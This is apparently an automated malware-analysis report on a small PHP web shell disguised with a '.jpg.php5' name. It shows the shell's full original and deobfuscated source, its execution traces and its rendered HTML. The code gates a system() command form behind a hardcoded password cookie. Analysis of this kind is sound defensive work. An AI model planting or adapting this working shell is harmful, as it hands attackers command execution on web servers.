PHP Malware Analysis

webshell.jpg.php5, webshell.php

md5: 587b9b91c457cda9890a31cc31ac93c5

Attributes

Execution

Input

Title

URLs


Deobfuscated PHP code

<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php 
if ($_COOKIE['password'] == "haxor1337") {
    echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
    echo system($_POST['cmd']);
    echo "</p>";
} else {
    echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
    echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
}
if ($_POST['pasw'] == "haxor1337") {
    $value = "haxor1337";
    setcookie("password", $value);
}
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/

Execution traces

data/traces/587b9b91c457cda9890a31cc31ac93c5_trace-1676244847.1004.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:32.998256]
1	0	1	0.000146	393528
1	3	0	0.000208	396592	{main}	1		/var/www/html/uploads/webshell.php	0	0
1	3	1	0.000257	396592
			0.000285	314240
TRACE END   [2023-02-12 21:34:32.998426]

data/traces/587b9b91c457cda9890a31cc31ac93c5_trace-1676250477.8765.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:08:23.774311]
1	0	1	0.000136	393576
1	3	0	0.000205	396640	{main}	1		/var/www/html/uploads/webshell.jpg.php5	0	0
1	3	1	0.000245	396640
			0.000270	314264
TRACE END   [2023-02-12 23:08:23.774472]


Generated HTML code

<html><head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
password</p><form method="POST"><input type="password" name="pasw"><input type="submit"></form><img src="https://i.im.ge/2022/06/10/rzuzlc.jpg" alt="rzuzlc.jpg" border="0">            <p></p>
        </center>
    


/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
</body></html>

Original PHP code

<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php
    if($_COOKIE['password'] == "haxor1337"){
        echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
        echo system($_POST['cmd']);
        echo "</p>";
    }else{
        echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
        echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
    }
    
    if($_POST['pasw'] == "haxor1337"){
        $value = "haxor1337";
        setcookie("password", $value);
    }
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/